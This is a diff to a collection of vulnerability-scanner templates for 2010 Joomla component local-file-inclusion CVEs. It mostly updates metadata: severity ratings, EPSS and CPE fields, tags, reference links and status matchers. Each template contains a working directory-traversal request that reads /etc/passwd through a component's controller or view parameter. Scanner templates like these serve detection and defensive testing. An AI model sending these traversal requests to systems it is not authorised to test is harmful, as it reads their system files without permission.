b/http/cves/2010/CVE-2010-0972.yaml index 6dfbfe6681..e984dbb1c8 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/11738 - https://nvd.nist.gov/vuln/detail/CVE-2010-0972 - - http://web.archive.org/web/20140804152652/http://secunia.com/advisories/38925/ - http://www.exploit-db.com/exploits/11738 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56863 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0972 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.00813 + cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: g4j.laoneo + product: com_gcalendar + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 26bfe08e34..5924a8783f 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -3,7 +3,7 @@ id: CVE-2010-0982 info: name: Joomla! Component com_cartweberp - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/10942 @@ -16,19 +16,25 @@ info: cvss-score: 4.3 cve-id: CVE-2010-0982 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.0087 + cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_cartweberp + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index ddcb6ae8fb..28ef19e752 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/10948 - https://nvd.nist.gov/vuln/detail/CVE-2010-0985 - - http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560 - http://www.exploit-db.com/exploits/10948 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/55348 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-0985 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01222 + cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: chris_simon + product: com_abbrev + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 7384ca7f75..170dbc29c1 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1056 info: name: Joomla! Component com_rokdownloads - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11760 - https://nvd.nist.gov/vuln/detail/CVE-2010-1056 - - http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/ - - http://web.archive.org/web/20151023104850/http://secunia.com/advisories/38982/ + - http://www.rockettheme.com/extensions-updates/638-rokdownloads-10-released + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56898 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1056 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.06484 + cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rockettheme + product: com_rokdownloads + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index f1038daacf..527b35c0d2 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1081 info: name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11511 @@ -15,19 +15,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1081 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.02282 + cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: corejoomla + product: com_communitypolls + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 6bb0cf798e..b7833be0f6 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1217 info: name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. reference: - https://www.exploit-db.com/exploits/11814 - https://nvd.nist.gov/vuln/detail/CVE-2010-1217 - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt - - http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866 + - http://www.exploit-db.com/exploits/11814 remediation: Apply all relevant security patches and product upgrades. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-1217 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin + epss-score: 0.01155 + cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: je_form_creator + product: je_form_creator + tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 36ddeade8d..78bef0b5cb 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -3,32 +3,37 @@ id: CVE-2010-1219 info: name: Joomla! Component com_janews - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11757 - https://nvd.nist.gov/vuln/detail/CVE-2010-1219 - - http://web.archive.org/web/20161009134632/http://secunia.com/advisories/38952 - - http://web.archive.org/web/20210617075625/https://www.securityfocus.com/bid/38746 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/56901 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1219 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00813 + cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: com_janews + product: com_janews + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 90bca826ff..fdac5d99dc 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1302 info: name: Joomla! Component DW Graph - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11978 @@ -16,19 +16,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1302 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi,graph + epss-score: 0.01204 + cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: decryptweb + product: com_dwgraphs + tags: edb,cve,cve2010,joomla,lfi,graph http: - method: GET path: - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 66c0e78c2c..64a95367bf 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1304 info: name: Joomla! Component User Status - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11998 - https://nvd.nist.gov/vuln/detail/CVE-2010-1304 - - http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174 - http://www.exploit-db.com/exploits/11998 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57483 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1304 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,status,edb,cve + epss-score: 0.0045 + cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_userstatus + tags: cve2010,joomla,lfi,status,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 21afe4c34e..425d3d289c 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -3,32 +3,39 @@ id: CVE-2010-1305 info: name: Joomla! Component JInventory 1.23.02 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12065 - https://nvd.nist.gov/vuln/detail/CVE-2010-1305 - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951 - - http://web.archive.org/web/20140806165126/http://secunia.com/advisories/39351/ + - http://www.vupen.com/english/advisories/2010/0811 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57538 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1305 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.03203 + cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_jinventory + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 56ad8ebd10..011e567332 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -8,27 +8,32 @@ info: reference: - https://www.exploit-db.com/exploits/12058 - https://nvd.nist.gov/vuln/detail/CVE-2010-1306 - - http://web.archive.org/web/20140805134149/http://secunia.com/advisories/39338/ - - http://web.archive.org/web/20210121195240/https://www.securityfocus.com/bid/39200/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57508 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1306 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: roberto_aloi + product: com_joomlapicasa2 + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 065517053d..c080141c9e 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1307 info: name: Joomla! Component Magic Updater - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12070 - https://nvd.nist.gov/vuln/detail/CVE-2010-1307 - - http://web.archive.org/web/20140806154402/http://secunia.com/advisories/39348/ - http://www.vupen.com/english/advisories/2010/0806 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57531 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1307 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.01751 + cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: software.realtyna + product: com_joomlaupdater + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index f31726b3bb..2b15bb83e4 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1308 info: name: Joomla! Component SVMap 1.1.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12066 @@ -15,19 +15,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1308 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01334 + cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: la-souris-verte + product: com_svmap + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index c09f623b60..83ac573be6 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1312 info: name: Joomla! Component News Portal 1.5.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12077 @@ -16,19 +16,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1312 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.01155 + cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ijoomla + product: com_news_portal + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index 83f73fd79c..f0ef6c2a34 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1313 info: name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12082 @@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N + cvss-score: 4.3 cve-id: CVE-2010-1313 cwe-id: CWE-22 - cvss-score: 4.3 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.0045 + cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: seber + product: com_sebercart + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 21837a3f67..cc92a0b209 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1314 info: name: Joomla! Component Highslide 1.5 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12086 @@ -16,19 +16,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1314 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00477 + cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlanook + product: com_hsconfig + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index a2e20b8354..8c951f9e6f 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1315 info: name: Joomla! Component webERPcustomer - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11999 - https://nvd.nist.gov/vuln/detail/CVE-2010-1315 - - http://web.archive.org/web/20140801092842/http://secunia.com/advisories/39209/ - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57482 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1315 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.0087 + cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlamo + product: com_weberpcustomer + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 000fe3e17e..eb4aa14aa1 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1340 info: name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/33797 - https://nvd.nist.gov/vuln/detail/CVE-2010-1340 - - http://web.archive.org/web/20210121195000/https://www.securityfocus.com/bid/38917/ - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57123 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1340 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.01155 + cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla-research + product: com_jresearch + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 5c4140a495..bb173a095e 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1345 info: name: Joomla! Component Cookex Agency CKForms - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/15453 @@ -15,19 +15,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1345 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2010,joomla + epss-score: 0.00477 + cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cookex + product: com_ckforms + tags: lfi,edb,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index d42b08ff69..7dd39e516c 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -3,12 +3,11 @@ id: CVE-2010-1352 info: name: Joomla! Component Juke Box 1.7 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12084 - https://nvd.nist.gov/vuln/detail/CVE-2010-1352 - - http://web.archive.org/web/20140724194110/http://secunia.com/advisories/39357/ - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt remediation: Upgrade to a supported version. classification: @@ -16,19 +15,25 @@ info: cvss-score: 5 cve-id: CVE-2010-1352 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.00477 + cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jooforge + product: com_jukebox + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 02a2d7fb5f..f23ad6a672 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -3,31 +3,37 @@ id: CVE-2010-1353 info: name: Joomla! Component LoginBox - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12068 - https://nvd.nist.gov/vuln/detail/CVE-2010-1353 - - http://web.archive.org/web/20210121195246/https://www.securityfocus.com/bid/39212/ - http://www.vupen.com/english/advisories/2010/0808 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57533 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1353 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01751 + cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wowjoomla + product: com_loginbox + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 4be87fbeb0..c488906b3b 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1354 info: name: Joomla! Component VJDEO 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12102 - https://nvd.nist.gov/vuln/detail/CVE-2010-1354 - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt - - http://web.archive.org/web/20140724190841/http://secunia.com/advisories/39296/ + - http://www.exploit-db.com/exploits/12102 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1354 cwe-id: 